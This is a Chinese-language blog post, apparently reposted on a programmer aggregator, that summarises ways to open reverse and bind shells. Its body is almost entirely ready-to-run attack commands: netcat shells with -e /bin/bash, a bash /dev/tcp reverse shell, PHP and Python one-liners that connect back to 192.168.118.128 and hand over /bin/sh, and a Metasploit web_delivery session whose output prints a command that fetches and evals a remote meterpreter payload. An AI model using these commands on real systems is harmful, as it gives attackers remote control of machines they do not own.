python反弹shell_反弹Shell小结

全栈程序员-站长 • 2026年3月17日下午3:40 • 未分类 • 阅读 3

python反弹shell_反弹Shell小结1 NC 反弹 shell1 1 正向反弹 shell 服务器 nc lvvp7777 e bin bash 攻击机 ncserver ip77771 2 反向反弹 shell 攻击机 nc lvvp7777 服务器 nc e bin bashClient ip77771 3 不带 e 反弹 2 bash 反弹 shell2 1bash i 攻击机 nc lvvp7777 服务器 bash i amp

1、NC反弹shell

1.1、正向反弹shell

服务器

nc -lvvp 7777 -e /bin/bash

攻击机

nc server-ip 7777

1.2、反向反弹shell

攻击机

nc -lvvp 7777

服务器

nc -e /bin/bash Client-ip 7777

1.3、不带-e反弹：

2、 bash反弹shell

2.1 bash -i

攻击机

nc -lvvp 7777

服务器

bash -i >& /dev/tcp/Client-IP/7777 0>&1

3、PHP反弹shell

3.1 php -r

php -r ‘$sock=fsockopen(“192.168.118.128”,4444);exec(“/bin/sh -i &3 2>&3”);’

进行url编码：

4、python反弹

4.1、python -c

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.118.128”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.118.128”,5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

5、metasploit

5.1、web_delivery

use exploit/multi/script/web_delivery

msf > use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set target 1

target => 1

msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp

payload => php/meterpreter/reverse_tcp

msf exploit(web_delivery) > set lhost 192.168.118.128

lhost => 192.168.118.128

msf exploit(web_delivery) > set lport 6666

lport => 6666

msf exploit(web_delivery) > set SRVPORT 8888

SRVPORT => 8888

msf exploit(web_delivery) > run

[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.118.128:6666

[*] Using URL: http://0.0.0.0:8888/mDIK5UGRA8Qs76

[*] Local IP: http://192.168.118.128:8888/mDIK5UGRA8Qs76

[*] Server started.

[*] Run the following command on the target machine:

php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://192.168.118.128:8888/mDIK5UGRA8Qs76’));”

版权声明：本文内容由互联网用户自发贡献，该文观点仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容，请联系我们举报，一经查实，本站将立刻删除。

发布者：全栈程序员-站长，转载请注明出处：https://javaforall.net/222493.html原文链接：https://javaforall.net

赞 (0)

0 0

关于作者

全栈程序员-站长

133.5K 文章

3 粉丝

本网站汇聚当前互联网主流语音，持续更新，欢迎关注公众号“全栈程序员社区”

上一篇 2026年3月17日下午3:40

vue入门——webpack配置

下一篇 2026年3月17日下午3:40

5种IO模型、阻塞IO和非阻塞IO、同步IO和异步IO

5种IO模型、阻塞IO和非阻塞IO、同步IO和异步IO5 种 IO 模型阻塞 IO 和非阻塞 IO 同步 IO 和异步 IO 看了一些文章发现有很多不同的理解可能是因为大家入切的角度环境不一样所以我们先说明基本的 IO 操作及环境本文是在 UNIX 网络编程卷 1 套接字联网 API 6 2 节 I O 模型的基础上即 UNIX LINUX 环境下的网络 IO 环境下的理解它里面给出的例子是读取接收网络 UDP 数据下面简单写写自己对这些 IO

全栈程序员-站长
2026年3月18日
2
js深拷贝和浅拷贝具体使用区别_es6深拷贝和浅拷贝

js深拷贝和浅拷贝具体使用区别_es6深拷贝和浅拷贝“深拷贝” 与 “浅拷贝” 的区别，JS实现深浅拷贝的几种方法

全栈程序员-站长
2022年4月22日
42
matlab行列式的转置_matlab行列式左右翻转

matlab行列式的转置_matlab行列式左右翻转行列式转置，值不变>>a3=[6231;1215;5231;4121]a3=6231121552314121>&gt

全栈程序员-站长
2022年8月5日
9
linux平均负载什么意思_linux服务器负载高

linux平均负载什么意思_linux服务器负载高1,Linux系统的平均负载是什么?特定时间间隔内运行队列中的平均进程数，好象还不够明白：就是进程队列的长度，有多少个进程在排队等待运行2,什么是”进程队列”?一个进程满足以下条件就会位于进程队列中1,它没有在等待I/O操作的结果2,它没有主动进入等待状态(即没有调用wait)3,它没有被停止3,如何查看平均负载?最简单的命令是uptime例子：[www.linuxidc.com@localho…

全栈程序员-站长
2025年9月7日
10
html简单登录页面代码

html简单登录页面代码图片必须是在Imges下的否则显示不出来（复制代码的话把图片换成你的图片就好了）代码如下<html><head><title>tes

全栈程序员-站长
2022年6月13日
65
查看php的配置文件Php.ini的位置

查看php的配置文件Php.ini的位置

全栈程序员-站长
2021年9月25日
120

发表回复

关注全栈程序员社区公众号